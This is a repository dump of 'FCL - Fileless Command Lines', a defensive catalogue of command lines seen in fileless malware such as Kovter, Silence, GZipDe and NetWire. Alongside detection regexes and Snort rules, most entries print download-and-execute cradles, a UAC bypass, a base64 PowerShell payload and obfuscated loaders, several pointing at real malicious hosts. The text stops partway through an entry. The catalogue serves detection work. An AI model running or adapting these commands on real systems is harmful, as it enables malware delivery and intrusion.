├── Malwares ├── Locky.md ├── r77 rootkit.md ├── CryptoWorm.md ├── Magnitude EK.md ├── JS_POWMET.md ├── August.md ├── PowerSniff.md ├── Keybase.md ├── PowerWare.md ├── Kovter.md ├── Poweliks.md ├── Phase Bot.md ├── CodeFork.md ├── Astaroth.md ├── Silence.md ├── GZipDe.md ├── NetWire.md ├── Valyria.md ├── WMIGhost.md ├── Emotet.md └── Rozena.md └── README.md /Malwares/Locky.md: -------------------------------------------------------------------------------- 1 | ## Locky 2 | 3 | 4 | #### Commands 5 | --- 6 | 7 | * Winword.exe 8 | 9 | 1. 10 | ``` 11 | {ddeauto c:\\windows\\system32\\cmd.exe "/k powershell IEX(New-Object Net.WebClient).Downloadstring('[URL]' )" \* MERGEFORmAT} 12 | ``` 13 | 14 | #### Regular Expressions 15 | --- 16 | 17 | `` 18 | `` 19 | 20 | #### Resources 21 | --- 22 | 23 | Technical write-ups: 24 | * https://www.zscaler.com/blogs/research/microsoft-dde-protocol-based-malware-attacks 25 | 26 | Sandbox reports: 27 | * 28 | 29 | Notes: 30 | 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /Malwares/r77 rootkit.md: -------------------------------------------------------------------------------- 1 | ## r77 rootkit 2 | 3 | 4 | #### Commands 5 | --- 6 | 7 | * Powershell.exe 8 | 9 | 1. 10 | `` 11 | "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(‘SOFTWARE’).GetValue(‘$77stager’)).EntryPoint.Invoke($Null,$Null))" 12 | `` 13 | 14 | 15 | #### Regular Expressions 16 | --- 17 | 18 | 19 | 20 | #### Resources 21 | --- 22 | 23 | Technical write-ups: 24 | 25 | * https://github.com/bytecode77/r77-rootkit (Including source code) 26 | * https://bytecode77.com/downloads/r77%20Rootkit%20Technical%20Documentation.pdf 27 | 28 | 29 | Sandbox reports: 30 | 31 | 32 | Notes: 33 | 34 | 35 | 36 | 37 | -------------------------------------------------------------------------------- /Malwares/CryptoWorm.md: -------------------------------------------------------------------------------- 1 | ## CryptoWorm 2 | 3 | 4 | #### Commands 5 | --- 6 | 7 | * Powershell.exe 8 | 9 | 1. 10 | ``` 11 | "if(!([string](Get-WMIobject -Namespace root\Subscription -Class __FilterToConsumerBinding )).contains('SCM Event Filter')) {IEX(New-Object Net.WebClient).DownloadString('[URL]')}" 12 | ``` 13 | 14 | #### Regular Expressions 15 | --- 16 | 17 | `` 18 | ^(?=.*\bWMIobject\b)(?=.*\bSCM\b)(?=.*\bIEX\b)(?=.*\bDownloadString\b).*$ 19 | `` 20 | 21 | #### Resources 22 | --- 23 | 24 | Technical write-ups: 25 | * https://securityaffairs.co/wordpress/63488/malware/advanced-memory-cryptoworm.html 26 | 27 | Sandbox reports: 28 | * 29 | 30 | Notes: 31 | 32 | 33 | 34 | 35 | -------------------------------------------------------------------------------- /Malwares/Magnitude EK.md: -------------------------------------------------------------------------------- 1 | ## Magnitude EK 2 | 3 | 4 | #### Commands 5 | --- 6 | 7 | * Rundll32.exe 8 | 9 | 1. 10 | ``` 11 | javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject('script:http://dx30z30a4t11l7be .lieslow[.]faith/5aad4b91a0da20d4faab0991bdbe7138') 12 | ``` 13 | 14 | #### Regular Expressions 15 | --- 16 | 17 | `` 18 | ^(?=.*\bjavascript\b)(?=.*\bRunHTMLApplication\b)(?=.*\bGetObject\b)(?=.*\bscript:http\b).*$ 19 | `` 20 | 21 | #### Resources 22 | --- 23 | 24 | Technical write-ups: 25 | * https://blog.malwarebytes.com/threat-analysis/2018/04/magnitude-exploit-kit-switches-gandcrab-ransomware/ 26 | 27 | Sandbox reports: 28 | * 29 | 30 | Notes: 31 | 32 | 33 | 34 | 35 | -------------------------------------------------------------------------------- /Malwares/JS_POWMET.md: -------------------------------------------------------------------------------- 1 | ## JS_POWMET 2 | 3 | 4 | #### Commands 5 | --- 6 | 7 | * Powershell.exe 8 | 9 | 1. 10 | 11 | ``` 12 | -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\FTZLZTRLAPJCLE').ZRAKUTR))); 13 | ``` 14 | 15 | 16 | #### Regular Expressions 17 | --- 18 | 19 | 20 | #### Resources 21 | --- 22 | 23 | Technical write-ups: 24 | * https://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/ 25 | 26 | Sandbox reports: 27 | * https://www.hybrid-analysis.com/sample/bff21cbf95da5f3149c67f2c0f2576a6de44fa9d0cb093259c9a5db919599940?environmentId=100 28 | 29 | Notes: 30 | 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /Malwares/August.md: -------------------------------------------------------------------------------- 1 | ## August 2 | 3 | 4 | #### Commands 5 | --- 6 | 7 | * Powershell.exe 8 | 9 | 1. 10 | 11 | ``` 12 | -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://[URL].asp') | iex 13 | ``` 14 | 15 | 16 | #### Regular Expressions 17 | --- 18 | 19 | `` 20 | ^(?=.*\bbypass\b)(?=.*\bNet\.WebClient\b)(?=.*\bDownloadFile\b)(?=.*\biex\b).*$ 21 | `` 22 | 23 | #### Resources 24 | --- 25 | 26 | Technical write-ups: 27 | * https://www.proofpoint.com/us/threat-insight/post/august-in-december-new-information-stealer-hits-the-scene 28 | 29 | Sandbox reports: 30 | * https://www.hybrid-analysis.com/sample/c432cc99b390b5edbab400dcc322f7872d3176c08869c8e587918753c00e5d4e?environmentId=100 31 | 32 | Notes: 33 | 34 | 35 | 36 | 37 | -------------------------------------------------------------------------------- /Malwares/PowerSniff.md: -------------------------------------------------------------------------------- 1 | ## PowerSniff 2 | 3 | 4 | #### Commands 5 | --- 6 | 7 | * Powershell.exe 8 | 9 | 1. 10 | ``` 11 | -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c if ([IntPtr]::size -eq 4) {(new-object Net.WebClient).DownloadString('http://rabbitons[.]pw/cache') | iex } else {(new-object Net.WebClient).DownloadString('http://rabbitons[.]pw/css') | iex} 12 | ``` 13 | 14 | 15 | #### Regular Expressions 16 | --- 17 | 18 | 19 | 20 | #### Resources 21 | --- 22 | 23 | Technical write-ups: 24 | * https://researchcenter.paloaltonetworks.com/2016/03/powersniff-malware-used-in-macro-based-attacks/ 25 | 26 | Sandbox reports: 27 | * https://www.hybrid-analysis.com/sample/a8663becc17e34f85d828f53029ab110f92f635c3dfd94132e5ac87e2f0cdfc3?environmentId=4 28 | 29 | Notes: 30 | 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /Malwares/Keybase.md: -------------------------------------------------------------------------------- 1 | ## Keybase 2 | 3 | 4 | #### Commands 5 | --- 6 | 7 | * Powershell.exe 8 | 9 | 1. 10 | 11 | `` 12 | -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://[URL],'%TEMP%\\pu457.exe') & reg add HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /d %TEMP%\\pu457.exe /f & eventvwr.exe & PING -n 15 127.0.0.1>nul & %TEMP%\\pu457.exe 13 | `` 14 | 15 | #### Regular Expressions 16 | --- 17 | 18 | `` 19 | `` 20 | 21 | #### Resources 22 | --- 23 | 24 | Technical write-ups: 25 | * https://isc.sans.edu/forums/diary/Malicious+Office+files+using+fileless+UAC+bypass+to+drop+KEYBASE+malware/22011/ 26 | 27 | Sandbox reports: 28 | * https://www.hybrid-analysis.com/sample/e431bc1bacde51fd39a10f418c26487561fe7c3abee15395314d9d4e621cc38e?environmentId=100 29 | 30 | Notes: 31 | 32 | 33 | 34 | 35 | -------------------------------------------------------------------------------- /Malwares/PowerWare.md: -------------------------------------------------------------------------------- 1 | ## PowerWare 2 | 3 | 4 | #### Commands 5 | --- 6 | 7 | * Cmd.exe 8 | 9 | 1. 10 | ``` 11 | /K poweRshell.exe -WindowStyle hiddeN -ExecuTionPolicy BypasS -noprofile (New-Object System.Net.WebClient).DownloadFile('http://skycpa. in/file.php','%TEMP%\Y.ps1'); poWerShEll.exe -WindowStyle hiddeN -ExecutionPolicy Bypass -noprofile -file %TEMP%\Y.ps1 12 | ``` 13 | 14 | 15 | #### Regular Expressions 16 | --- 17 | 18 | `` 19 | 20 | `` 21 | 22 | #### Resources 23 | --- 24 | 25 | Technical write-ups: 26 | * https://www.carbonblack.com/2016/03/25/threat-alert-powerware-new-ransomware-written-in-powershell-targets-organizations-via-microsoft-word/ 27 | 28 | Sandbox reports: 29 | * https://www.hybrid-analysis.com/sample/69ee6349739643538dd7eb60e92368f209e12a366f00a7b80000ba02307c9bdf?environmentId=100 30 | 31 | Notes: 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /Malwares/Kovter.md: -------------------------------------------------------------------------------- 1 | ## Kovter 2 | 3 | 4 | #### Commands 5 | --- 6 | 7 | * Mshta.exe 8 | 9 | 1. 10 | ``` 11 | javascript:d7hcQ4a="vn";n0a=new%20ActiveXObject("WScript.Shell");Rtf7j="HIPc";X18ycI=n0a.RegRead("HKCU\\software\\tN32795\\74gjfzcsfI");jM5IV6m="QJ";eval(X18ycI);XIaL0uze="lYuLz1vG" 12 | ``` 13 | 14 | #### Regular Expressions 15 | --- 16 | 17 | `` 18 | ^(?=.*\bjavascript:\b)(?=.*\bWScript\.Shell\b)(?=.*\bRegRead\b)(?=.*\beval\b).*$ 19 | `` 20 | 21 | #### Resources 22 | --- 23 | 24 | Technical write-ups: 25 | * https://threatvector.cylance.com/en_us/home/threat-spotlight-kovter-malware-fileless-persistence-mechanism.html 26 | 27 | Sandbox reports: 28 | * https://www.hybrid-analysis.com/sample/5addc5c129282e9705b65b7156134e1c752a9ed2379a75471795c5c95e2a2110?environmentId=100 29 | * https://www.hybrid-analysis.com/sample/f5be23df0cfd529674c9939bf11e4d0f61693f898cf989e7b7acf62202c0874e?environmentId=100 30 | 31 | Notes: 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /Malwares/Poweliks.md: -------------------------------------------------------------------------------- 1 | ## Poweliks 2 | 3 | 4 | #### Commands 5 | --- 6 | 7 | * Rundll32.exe 8 | 9 | 1. 10 | ``` 11 | javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>") 12 | ``` 13 | 14 | #### Regular Expressions 15 | --- 16 | 17 | `` 18 | ^(?=.*\bjavascript\b)(?=.*\bRunHTMLApplication\b)(?=.*\bWScript\.Shell\b)(?=.*\bRegRead\b).*$ 19 | `` 20 | 21 | #### Resources 22 | --- 23 | 24 | Technical write-ups: 25 | * https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/ 26 | * https://www.symantec.com/connect/blogs/poweliks-click-fraud-malware-goes-fileless-attempt-prevent-removal 27 | * http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/evolution-of-poweliks.pdf 28 | 29 | Sandbox reports: 30 | * 31 | 32 | Notes: 33 | 34 | 35 | 36 | 37 | -------------------------------------------------------------------------------- /Malwares/Phase Bot.md: -------------------------------------------------------------------------------- 1 | ## Phase Bot 2 | 3 | 4 | #### Commands 5 | --- 6 | 7 | * Rundll32.exe 8 | 9 | 1. 10 | ``` 11 | javascript:”..mshtml,RunHTMLApplication “;eval((new%20ActiveXObject(“WScript.Shell”)).RegRead(“HKCUSoftwareMicrosoftActive%20SetupInstalled%20Components{72507C54-3577-4830-815B-310007F6135A}JavaScript”));close(); 12 | ``` 13 | 14 | #### Regular Expressions 15 | --- 16 | 17 | `` 18 | ^(?=.*\bjavascript\b)(?=.*\bRunHTMLApplication\b)(?=.*\bWScript\.Shell\b)(?=.*\bRegRead\b)(?=.*\bHKCUSoftwareMicrosoftActive\b).*$ 19 | `` 20 | 21 | #### Resources 22 | --- 23 | 24 | Technical write-ups: 25 | * https://www.malwaretech.com/2014/12/phase-bot-fileless-rootki.html 26 | * https://www.malwaretech.com/2014/12/phase-bot-fileless-rootkit-part-2.html 27 | 28 | Sandbox reports: 29 | * https://www.hybrid-analysis.com/sample/438258d0710ddbb280a5a1ed801392a5194eaece16ba85591fe5eb4815bf56a8?environmentId=100 30 | 31 | 32 | Notes: 33 | 34 | https://twitter.com/MalwareTechBlog/status/543342292917301248 @MalwareTechBlog 35 | 36 | 37 | 38 | 39 | 40 | -------------------------------------------------------------------------------- /Malwares/CodeFork.md: -------------------------------------------------------------------------------- 1 | ## CodeFork 2 | 3 | 4 | 5 | 6 | #### Commands 7 | --- 8 | 9 | * Powershell.exe 10 | 11 | 1. 12 | `` 13 | -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\[Same Random Key]').[Random Value Name]))); 14 | `` 15 | 16 | 2. 17 | `` 18 | -nop -ep Bypass -noexit -c [System.Net.ServicePointManager]: ServerCertificateValidationCallback = { $true }; iex ((New-Object System.Net.WebClient).DownloadString('https://somerandomevildomain.xx /somerandomflie')) 19 | `` 20 | 21 | * Regsvr.exe 22 | 23 | 1. 24 | `` 25 | /s /u /i:http://xxx.somerandomevildomain.xx/evilpath.xml scrobj.dl 26 | `` 27 | 28 | #### Regular Expressions 29 | --- 30 | 31 | `` 32 | ^(?=.*\bNonInteractive\b)(?=.*\bbypass\b)(?=.*\bASCII\.GetString\b)(?=.*\bHKCU\b).*$ 33 | `` 34 | 35 | #### Resources 36 | --- 37 | 38 | Technical write-ups: 39 | * https://security.radware.com/malware/codefork-malware/ 40 | 41 | Sandbox reports: 42 | * 43 | 44 | Notes: 45 | 46 | 47 | 48 | 49 | -------------------------------------------------------------------------------- /Malwares/Astaroth.md: -------------------------------------------------------------------------------- 1 | ## Astaroth 2 | 3 | 4 | #### Commands 5 | --- 6 | 7 | * Wmic.exe 8 | 9 | 1. [partial] 10 | ``` 11 | os get ved5hit39, 25hit8, numberofusers /format:"https://storage.googleapis.com/ultramaker/09/v.txt" 12 | ``` 13 | 14 | 2. [partial] 15 | ``` 16 | os get QMUTSQPK, JUXKBVOK, LNFTZKMH, freephyscialmemory /format:"https://storage.googleapis.com/ultramaker/08/vv.txt" 17 | ``` 18 | 19 | * Bitsadmin.exe 20 | 21 | 1. [partial] 22 | ``` 23 | /transfer msd5 /priority foreground https://storage.googleapis.com/ultramaker/x/ 09/falcvonxrenwb.jpg.zip.log? %PUBLIC%\Libraries\temporary\falxconxrenwb.jpg.z 24 | ``` 25 | 26 | * Certutil.exe 27 | 28 | 1. 29 | ``` 30 | -decode %PUBLIC%\Libraries\temporary\falxconxrenwb.jpg.z %PUBLIC%\Libraries\temporary\falxconxrenwb.~ 31 | ``` 32 | 33 | * Regsvr32.exe 34 | 35 | 1. 36 | ``` 37 | /s falxconxrenw64.~ 38 | ``` 39 | 40 | #### Regular Expressions 41 | --- 42 | 43 | 44 | 45 | #### Resources 46 | --- 47 | 48 | Technical write-ups: 49 | * https://www.microsoft.com/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/ 50 | 51 | Sandbox reports: 52 | 53 | 54 | Notes: 55 | 56 | 57 | 58 | 59 | -------------------------------------------------------------------------------- /Malwares/Silence.md: -------------------------------------------------------------------------------- 1 | ## Silence 2 | 3 | 4 | #### Commands 5 | --- 6 | 7 | * Mshta.exe 8 | 9 | 1. 10 | `` 11 | vBsCRIPT:EXECute("dv = Array(""W"", ""l"") : Set sdf = createObject(dv(0)+""ScRipt.She""+dv(1)+dv(1)): sdf.rUn ""ping 127.0.0.2 -n 99"", 0, 1: sdf.rUn ""cmd.exe /c powe%ALLUSERSPROFILE:~4,1%shell.exe """"$hjf=New-Object System.Net.WebClient;$hjf.Proxy=[System.N^et.WebRequest]::GetSystemWebProxy();$hjf.Proxy.Credentials=[System.N^et.CredentialCache]::DefaultCredentials;$hjf.Headers.Add('User-Agent','M/5.18');$r=$hjf.DownloadString('http://193.109.69.5/gggm/upl/txt');IEX $r"""""", 0 : window.close") 12 | `` 13 | 14 | * Cmd.exe 15 | 16 | 1. 17 | `` 18 | /c powe%ALLUSERSPROFILE:~4,1%shell.exe "$hjf=New-Object System.Net.WebClient;$hjf.Proxy=[System.N^et.WebRequest]::GetSystemWebProxy();$hjf.Proxy.Credentials=[System.N^et.CredentialCache]::DefaultCredentials;$hjf.Headers.Add('User-Agent','M/5.18');$r=$hjf.DownloadString('http://193.109.69.5/gggm/upl/txt');IEX $r 19 | `` 20 | 21 | * Powershell.exe 22 | 23 | 1. 24 | `` 25 | "$hjf=New-Object System.Net.WebClient;$hjf.Proxy=[System.N^et.WebRequest]::GetSystemWebProxy();$hjf.Proxy.Credentials=[System.N^et.CredentialCache]::DefaultCredentials;$hjf.Headers.Add('User-Agent','M/5.18');$r=$hjf.DownloadString('http://193.109.69.5/gggm/upl/txt');IEX $r" 26 | `` 27 | 28 | #### Regular Expressions 29 | --- 30 | 31 | 32 | 33 | #### Resources 34 | --- 35 | 36 | Technical write-ups: 37 | * https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf 38 | 39 | Sandbox reports: 40 | 41 | * https://app.any.run/tasks/23735fe4-6ff8-4a31-aace-775be70e8097/ 42 | 43 | Notes: 44 | 45 | 46 | 47 | 48 | -------------------------------------------------------------------------------- /Malwares/GZipDe.md: -------------------------------------------------------------------------------- 1 | ## GZipDe 2 | 3 | 4 | #### Commands 5 | --- 6 | 7 | * Schtasks.exe 8 | 9 | 1. 10 | 11 | ``` 12 | /Create /sc MINUTE /MO 1 /TN WindowsUpdate /TR "Powershell -W Hidden (New-Object System.Net.WebClient).DownloadFile(\\\"http://118.193.251.137/dropbox/?p=BT67HU78HZ\\\",\\\"$env:public\svchost325.vbs\\\");(New-Object -com Shell.Application).ShellExecute(\\\"$env:public\svchost325.vbs\\\");" /F 13 | ``` 14 | 15 | * Powershell.exe 16 | 17 | 1. 18 | 19 | ``` 20 | -W Hidden (New-Object System.Net.WebClient).DownloadFile(\\\'http[:]//118.193.251[.]137/dropbox/?p=BT67HU78HZ\\\',\\\'$env:public\svchost325.vbs\\\');(New-Object -com Shell.Application).ShellExecute(\\\'$env:public\svchost325.vbs\\\');' /F 21 | ``` 22 | 23 | #### Regular Expressions 24 | --- 25 | 26 | `` 27 | `` 28 | 29 | #### Resources 30 | --- 31 | 32 | Technical write-ups: 33 | * https://www.alienvault.com/blogs/labs-research/gzipde-an-encrypted-downloader-serving-metasploit 34 | 35 | Sandbox reports: 36 | * https://app.any.run/tasks/e918c80e-ce60-42d6-b365-8fd3256420f0 37 | 38 | Notes: 39 | 40 | @Alienvault 41 | 42 | #### Network Detection 43 | 44 | Multi-purpose: 45 | 46 | * AV ATTACK_RESPONSE Metasploit Reverse Shell Verification (Echo) 47 | 48 | * ET ATTACK_RESPONSE Metasploit/Meterpreter - Sending metsrv.dll to Compromised Host 49 | 50 | * ET ATTACK_RESPONSE Metasploit Meterpreter Reverse HTTPS certificate 51 | 52 | Dedicated: 53 | 54 | * alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"AV TROJAN GZipDe MacroMalware CnC Checkin"; flow:established,to_server; content:"/dropbox/?p="; http_uri; depth:12; content:!"User-Agent|3a| "; http_header; content:!"Referer"; http_header; pcre:"^/\/dropbox\/\?p=[a-zA-Z0-9]*$/U"; reference:md5,951d9f3320da660593930d3425a9271b; classtype:trojan-activity; sid:xxx; rev:1;) 55 | 56 | * alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"AV TROJAN GZipDe MacroMalware Payload Request"; flow:established,to_server; content:"/dropbox/file"; depth:13; http_uri; content:".exe"; http_uri; distance:0; isdataat:!1,relative; content:!"User-Agent|3a| "; http_header; content:!"Referer"; http_header; reference:md5,951d9f3320da660593930d3425a9271b; classtype:trojan-activity; sid:xxx; rev:1;) 57 | 58 | 59 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # FCL - Fileless Command Lines 2 | Known command-lines of fileless malicious executions. 3 | 4 | ## Motivation 5 | 6 | While hashing malicious files to identify malicious executions is easy, blocking the execution of fileless malware is more challenging. 7 | This repository's purpose is to collect command lines being used by threat actors, to ease the difficult of identifying them. 8 | 9 | ## Structure 10 | 11 | Each FCL file contains\may contain the following data: 12 | * Malware name 13 | * Executing process(es) 14 | * Malicious command-lines (contain dysfunctional URLs) 15 | * Fully\Partially deobfuscated command-lines 16 | * Regular Expression for detection 17 | * Technical write-ups 18 | * Sandbox report links 19 | * Notes 20 | 21 | ## Contributions 22 | If you have any malicious related command line (deobfuscated or not), sandbox links, technical write-up, regular expression or any useful suggestion, please share it with me and I will update this repository accordingly. 23 | 24 | ## References 25 | Here are some great references elaborating on fileless malicious executions and the use of it through time: 26 | * https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/fileless-threats 27 | * https://blog.malwarebytes.com/threat-analysis/2018/08/fileless-malware-getting-the-lowdown-on-this-insidious-threat/ 28 | * https://zeltser.com/fileless-malware-beyond-buzzword/ 29 | 30 | 31 | ## GPL 3 32 | FCL - Fileless Command Lines Copyright (C) 2018, Chen Erlich ([@chen_erlich](https://twitter.com/chen_erlich)). 33 | 34 | This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. 35 | 36 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. 37 | 38 | You should have received a copy of the GNU General Public License along with this program. If not, see http://www.gnu.org/licenses/. 39 | 40 | 41 | ## TODO 42 | - [ ] Add more fileless malwares 43 | - [ ] Sharp\add regular expressions 44 | -------------------------------------------------------------------------------- /Malwares/NetWire.md: -------------------------------------------------------------------------------- 1 | ## NetWire 2 | 3 | 4 | #### Commands 5 | --- 6 | 7 | * Powershell.exe 8 | 9 | 1. 10 | `` 11 | "-Command IEX (New-Object('Net.WebClient')).'DoWnloadsTrInG'('http://spacemantra.biz/blyat.jpeg')" 12 | `` 13 | 14 | 2. 15 | `` 16 | "-ep Bypass -w 1 /e JABYAHcAIAA9ACAAJwBNAHUAZwBwAGoAcwBjAFcAQgAnADsACgAkAFAAcwBiAGIAWQBWAGwAYgBrACAAPQAgACgAJwB7ADIAfQB7ADAAfQB7ADEAfQB7ADMAfQAnAC0AZgAnAGQAUwB0ACcALAAnAHIAaQBuACcALAAcIGAARABgAG8AYAB3AG4AYABsAGAAbwBhAB0gLAAnAGcAJwApADsAWwB2AG8AaQBkAF0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAFcAaQB0AGgAUABhAHIAdABpAGEAbABOAGEAbQBlACgAJwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAnACkAOwAkAFQAUwBRAG4AQgB6AEkAQgBhAGUAWgBzAEgAbgBIAG8AaQBRAGIAbwBPAHUAVgBtAFAAUABwAE8ARABvAGYAZwBEAEQAUgBPAEYAZgBBAHYASgBhAHQAWABlAGcAeAB3AG4AWgBpAGsAdABwAG0AbgBDAHEARgBoAGwATQBpAHAASgBZAFEAVgBDAHkAegBTAEkAcQBjAGYAZQB3AHYAagA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAUABzAGIAYgBZAFYAbABiAGsALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBzAHAAYQBjAGUAbQBhAG4AdAByAGEALgBiAGkAegAvAHIAbgBwAC4AdAB4AHQAJwApAC4AUgBlAHAAbABhAGMAZQAoACIAXgBeACIALAAgACIANAA0ACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACoAKgAiACwAIAAiADQAOAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAjACMAIgAsACAAIgA3ADgAIgApAHwASQBFAFgAOwBbAEIAeQB0AGUAWwBdAF0AJABUAFMAUQBuAEIAegBJAEIAYQBlAFoAcwBIAG4ASABvAGkAUQBiAG8ATwB1AFYAbQBQAFAAcABPAEQAbwBmAGcARABEAFIATwBGAGYAQQB2AEoAYQB0AFgAZQBnAHgAdwBuAFoAaQBrAHQAcABtAG4AQwBxAEYAaABsAE0AaQBwAEoAWQBRAFYAQwB5AHoAUwBJAHEAYwBmAGUAdwB2AD0AWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEkAbgB0AGUAcgBhAGMAdABpAG8AbgBdADoAOgBDAGEAbABsAEIAeQBuAGEAbQBlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAHCBgAE4AYABlAGAAVABgAC4AYABXAGAAZQBgAEIAYABDAGAAbABgAGkAYABlAGAATgBgAFQAHSApACwAJABQAHMAYgBiAFkAVgBsAGIAawAsAFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBDAGEAbABsAFQAeQBwAGUAXQA6ADoATQBlAHQAaABvAGQALAAnAGgAdAB0ACcAKwBbAEMAaABhAHIAXQA4ADAAKwAnACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHMAcABhAGMAZQBtAGEAbgB0AHIAYQAuAGIAaQB6AC8AbQBhAGkAbgAuAHQAeAB0ACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnAEAAJwAsACcAMAB4ACcAKQB8AEkARQBYADsAWwBDAC4ATQBdADoAOgBSACgAJwBNAFMAQgB1AGkAbABkAC4AZQB4AGUAJwAsACQAVABTAFEAbgBCAHoASQBCAGEAZQBaAHMASABuAEgAbwBpAFEAYgBvAE8AdQBWAG0AUABQAHAATwBEAG8AZgBnAEQARABSAE8ARgBmAEEAdgBKAGEAdABYAGUAZwB4AHcAbgBaAGkAawB0AHAAbQBuAEMAcQBGAGgAbABNAGkAcABKAFkAUQBWAEMAeQB6AFMASQBxAGMAZgBlAHcAdgApAA==" 17 | `` 18 | 19 | #### Regular Expressions 20 | --- 21 | 22 | 23 | 24 | #### Resources 25 | --- 26 | 27 | Technical write-ups: 28 | 29 | 30 | Sandbox reports: 31 | 32 | * https://app.any.run/tasks/5da55373-a1b5-47f9-b04b-b72d25c15fa8/ 33 | * https://www.joesandbox.com/analysis/245611/1/html 34 | 35 | Notes: 36 | 37 | 38 | 39 | 40 | -------------------------------------------------------------------------------- /Malwares/Valyria.md: -------------------------------------------------------------------------------- 1 | ## Valyria 2 | 3 | 4 | #### Commands 5 | --- 6 | 7 | * Cmd.exe 8 | 9 | 1. 10 | ``` 11 | Cmd /V/C"^se^t 8^J^Z^j= ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}^{^hctac};k^a^er^b;hi^b$^ ^met^I-^ekovn^I^;)h^ib^$^ ,r^T^S^$(e^l^i^F^d^ao^ln^w^oD.Zjb$^{^yrt^{)V^H^b^$ n^i^ rT^S^$(hc^aer^o^f;'^exe.'^+^ErH^$+'^\^'+ci^l^bup:vne^$^=h^ib$;'^6^4^5'^ ^=^ Er^H$^;)^'@^'(^tilp^S^.^'^OkP^B^6rC^K/r^b.m^oc^.ai^go^lonc^et^k^3^h//^:^p^t^th^@^SPavtf^hdT0/^gr^o^.m^irim^anrap^b^t^i//^:p^t^th^@^b^Y^F4h^aK/^gro.ak^ic^a^l//:ptth^@c^o^Ux8Iwxp/gr^o.^a^s^up^j//:pt^t^h@ajt^Z^z^4^5^G/^m^oc.^a^sun^oin^o^kni^p^e^ht//:^p^tth^'=V^Hb$;tne^ilC^b^e^W^.^t^eN tc^ejb^o^-^wen=^Zjb^$^ ^l^le^h^sre^w^op&&^for /^L %^s ^in (37^1^,^-1^,^0)^d^o ^s^e^t Z^4=!Z^4!!8^J^Z^j:~%^s,1!&&^if %^s l^ss ^1 cal^l %Z^4:^*Z^4^!=%" 12 | ``` 13 | 14 | Partially deobfuscated 15 | ``` 16 | Cmd /V/C"set 8JZj= }}{hctac};kaerb;hib$ metI-ekovnI;)hib$ ,rTS$(eliFdaolnwoD.Zjb${yrt{)VHb$ ni rTS$(hcaerof;'exe.'+ErH$+'\'+cilbup:vne$=hib$;'645' = ErH$;)'@'(tilpS.'OkPB6rCK/rb.moc.aigoloncetk3h//:ptth@SPavtfhdT0/gro.mirimanrapbti//:ptth@bYF4haK/gro.akical//:ptth@coUx8Iwxp/gro.asupj//:ptth@ajtZz45G/moc.asunoinoknipeht//:ptth'=VHb$;tneilCbeW.teN tcejbo-wen=Zjb$ llehsrewop&&for /L %s in (371,-1,0)do set Z4=!Z4!!8JZj:~%s,1!&&if %s lss 1 call %Z4:*Z4!=%" 17 | ``` 18 | 19 | 2. 20 | ``` 21 | CMd /V:/C"s^e^t ;^$=^301^ ^309^ ^0^51^ 5^19 ^591^ ^1^50^ ^5^31 